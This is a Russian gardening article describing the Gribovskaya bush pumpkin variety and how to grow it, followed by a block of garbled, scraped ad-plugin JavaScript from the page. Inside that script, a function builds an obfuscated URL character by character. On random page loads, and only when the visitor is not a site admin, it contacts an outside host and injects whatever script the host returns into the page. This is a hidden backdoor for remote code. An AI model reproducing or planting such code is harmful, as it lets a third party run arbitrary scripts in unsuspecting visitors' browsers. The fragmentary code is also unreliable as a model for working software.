Следует отметить то, что выращивание этой культуры достаточно простой процесс. Вам нужно лишь соблюдать определенные правила агротехники, а в будущем наслаждаться прекрасным урожаем. Сегодня мы вам расскажем о тыкве Грибовской кустовой, которая была выведена ещё в советском союзе в 1964 году. Да, о вещах, произведенных в СССР говорят — знак качества, поэтому советские сорта овощных культур также высоко ценятся в современном мире. Эта культура может произрастать практически во всех регионах России, поэтому, где бы вы ни жили: на севере или на юге, вам обязательно нужно познакомиться с этим сортом.

Тыква Грибовская: описание

Тыква Грибовская: описание

Выращивание тыквы Грибовской занимаются как на приусадебных участках, так и в промышленных фермерских масштабах. Поэтому она считается очень популярной на аграрном рынке. Это позднеспелый сорт, однако, тыква дает обильный урожай, поэтому через 130-140 дней после появления первых всходов, вы сможете порадовать себя ароматной тыквы. Завязи располагаются поодиночке. Цветочки напоминают колокольчик с пятью лепестками. Говоря о форме листьев, следует упомянуть: обычно они крупные с характерным темно зеленым окрасом.

Этот сорт выращивают как на земле, так и прицепляют его к какой-либо опоре. Поэтому очень часто огородники сажают эту тыкву на вертикальные грядки. Хорошо подойдёт и замена опоры рядом стоящей сельхоз постройкой. Плети могут цепляться за стены, образуя множество завязей.

Как мы уже отмечали, это тыква очень неприхотлива к климатическим условиям, поэтому она прекрасно чувствует себя и в умеренном климате, и в субтропическом. В среднем один плод весит от 2 до 7 килограмм. На один квадратный метр приходится примерно 6 кг плодов. Тыковки обычно сегментированные с характерным окрасом, шаровидной формы, слегка приплюснутые по краям.

Созревают плоды обычно дружно через четыре-пять месяцев от появления первых всходов. Плоды обычно имеют матовый окрас, в отличие от многих медовых сортов тыквы, плоды этого сорта серо-зеленые. Кожура достаточно тонкая, а вот мякоть плотная. По консистенции однородная, с ярко выраженным сладким вкусом. Плоды этого сорта употребляют в пищу как в свежем, так и в переработанном виде. Эта тыква хорошо хранится и транспортируется на дальние расстояния. Поэтому вы можете смело отправляйте её с дачи в город. Очень часто мякоть тыквы используют гипертоники для приготовления диетических блюд. В этой тыкве много содержится каротина, витаминов и микроэлементов. Благоприятно влияет этот продукт и на иммунитет человека, а также на работу пищеварительного тракта.

Сажая эту тыкву у себя на участке, помните, высаживать ее рядом с кабачками или патиссонами не нужно, так как эти культуры способны переопыляться. Поэтому в дальнейшем вкус и цвет таких плодов будет отличаться от ожидаемых. Лучше всего сажать тыкву рядом с бобовыми культурами, пасленовыми. Со временем, эта тыква только хорошеет, опытные огородники говорят о том, что через месяц после сбора урожая кусочки тыквы становятся ещё ароматнее и слаще.

Тыква грибовская кустовая: немного о сорте

Тыква грибовская кустовая: немного о сорте

Как мы уже отмечали ранее, Грибовская тыква относится к позднеспелым сортам. Урожай можно будет собирать через 4-5 месяцев после появления всходов. Это достаточно теплолюбивые и светолюбивые растения. Поэтому сажать их лучше на хорошо освещенном участке. К тому же, эта тыква очень любит плодородную и хорошо структурированную почву. Урожай у тыквы отменный и обильный, а сама культура очень неприхотлива. Следует отметить и то, что тыква устойчива к вредителям и болезням, однако профилактические осмотры стеблей и листьев все же осуществляет нужно.

Обычно этот сорт тыквы высаживают в открытый грунт в конце весны — в начале лета. Если же вы решите сажать тыкву рассадным способом, то посев семян в теплице следует производить уже в апреле. Урожай собирают обычно осенью, однако ее плоды хранятся вплоть до следующего лета. Все зависит от условий хранения. От одного растения вы можете получить до 10-12 кг спелых плодов. Однако если вы будете за тыквой хорошо ухаживать, то и урожайность будет выше.

В процессе выращивания важно правильно сформировать кусты, а также вовремя подкармливать и поливать растения. Несмотря на то, что тыква хорошо переносит засуху, вовремя осуществлять полив все же придется. Особенно важно в период вегетации обильно увлажнять почву, а вот во время сбора урожая растения вообще плевать не нужно. У этого сорта тыквы достаточно хороший иммунитет, поэтому она устойчива к различным неблагоприятным явлениям.

Если говорить о заболеваниях, то следует отметить устойчивость Грибовской к мучнистой росе, гнили и бактериозу. Однако растения не болеют только в том случае, когда вы правильно за ними ухаживаете. Для того чтобы предупредить развитие бактериальных и грибковых заболеваний, вам нужно регулярно мульчировать почву, поливать растения, а также пропалывать грядки. Иногда листья и стебли обсыпают золой или обрабатывают раствором из воды и луковой шелухи, для того чтобы предотвратить развитие многих заболеваний. Говоря о вредителях, заметим, на тыкве могут поселиться гусеницы, слизни и паутинные клещи. Хорошо приживается на Грибовской и тля. Поэтому вовремя обрабатывайте листья и стебли растений мыльным раствором или настойкой из чеснока.

Тыква грибовская: описание плюсов и минусов

Тыква грибовская: описание плюсов и минусов

У каждого сорта есть свои плюсы и минусы, поэтому было бы неправильно о говорить только о достоинствах тыквы, так что рассмотрим все стороны процесса выращивания Грибовской. Из преимуществ огородники отмечают высокую урожайность, отличные вкусовые качества плодов с характерным ярко выраженным ароматом и сладостью, однородность структуры мякоти, а также устойчивость к неблагоприятным погодным факторам. К тому же, этот сорт тыквы устойчив к различным болезням, а его плоды очень долго хранятся, со временем лишь раскрываясь во вкусовом качестве. Средняя масса одной тыковки составляет от 2 до 7 кг, причём вес плодов зависит от условий выращивания. От одного растения вы можете получить до 12 килограмм спелых и ароматных тыковок.

Отмечая недостатки, следует указать на то, что у этого сорта тыквы длительный вегетационный период, поэтому, если в вашем регионе короткое и холодное лето, не все плоды успевают вызреть. А значит, вам придется выращивать ее через рассаду, а это уже более длительный процесс и кропотливый. Этот сорт тыквы также требователен к плодородности почвы и к температуре во время пересаживания, поэтому, несмотря на устойчивость к заморозкам, сажать тыкву лучше всего в хорошо прогретую почву.

Правила агротехники

Как правильно выращивать тыкву должен знать каждый огородник. Сейчас мы вам расскажем об особенностях агротехники. Прежде чем сажать тыкву, вам нужно выбрать хороший семенной материал. Для этого вам нужно удалить все семена с повреждениями и дефектами. Помните о том, что их лучше всего сначала продезинфицировать, а затем прорастить, для того чтобы ростки развивались интенсивнее.

Это овощная культура не очень любит пересадки, так как корневая система плохо адаптируется к новым условиям, поэтому сразу сажайте семена в индивидуальные ёмкости. В горшочках лучше всего сделать дренажные отверстия, для того чтобы оттуда выходила лишняя влага. В каждый горшочек сажают по два-три семечка, для того чтобы увеличить процент всхожести, после того как ростки покажутся, лишнее удаляют. Если вы будете сажать семена без проращивания, то первые росточки появятся только через неделю. Так рассаду надо будет выращивать в течение 3 недель, а потом пересаживать в открытый грунт. Учитывая этот показатель, заранее рассчитывайте время посадки семян на рассаду.

Высадка в открытый грунт — в конце мая — начале июня. Грунт для выращивания рассады либо покупают в специализированном аграрном магазине, либо готовится самостоятельно, смешивая в равных частях перегной, песок и обычную землю с участка. Желательно эту самую землю предварительно прокалить, для того чтобы сорные растения не мешали рассаде. Семена следует прикрывать землей не более чем на 2 сантиметра, так как росткам при глубоком залегании семенного материала будет труднее пробиться. По завершении посева горшочки лучше всего накрыть пленкой, это необходимо делать для того, чтобы создать благоприятный внутренний климат.

После появления всходов пленку снимают и ставят горшки на подоконник, со временем рассаду нужно будет закалять, ведь таким образом ей будет проще в будущем приспособиться к новым условиям произрастания. В открытый грунт можно высаживать рассаду после того, как на растениях появятся по три-четыре листочка. На месте произрастания тыквы должно быть солнечно, а участок хорошо защищен от ветра.

Следует отметить то, что плети тыквы занимают достаточно большую площадь вокруг центрального стебля, поэтому лучше всего сажать этот сорт квадратно-гнездовым способом. При этом вам нужно оставлять между растениями расстояние не менее чем один метр. Лунки под посадку начинают готовить еще осенью. Участок перекапывают лопатой, а затем вносят туда удобрение.

Для этого используют минеральные, комплексные удобрения и органику. Часто в почву добавляют перегной или компост, а также древесную золу, для того чтобы структурировать почву, сделать её рыхлой и воздушной, после высадки вам нужно будет интенсивно полить саженцы водой, а затем повторять процесс поливки примерно один раз в неделю. Больше всего воды следует вносить в период вегетации, а во время сбора поливать тыкву совсем не нужно.

НА боковых побегах оставляйте по одному плоду, так как остальные вызреть не смогут. В период вегетации хорошо для развития плодов вносить под кусты минеральные удобрения, а также раствор коровяка, навозную жижу и нитрофоска. Все это нужно предварительно развести в воде.

Убирают этот сорт тыквы до заморозков, так как кожица плодов должна быть обязательно целостной, а сами тыквы неповрежденными, иначе урожай не будет долго храниться. Тыкву рекомендуют употреблять в пищу через месяц после сбора урожая, ведь в процессе хранения ее вкусовые качества улучшаются, а мякоть дозревает.

Заключение

В заключении следует отметить то, что этот сорт тыквы неприхотлив в уходе, а вот урожайность высокая, плоды имеют отличные вкусовые качества, а также приятный аромат. Тыковки можно транспортировать на дальние расстояния и долго хранить. А при правильном уходе этот сорт обязательно порадует вас вкусным и ароматным урожаем!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};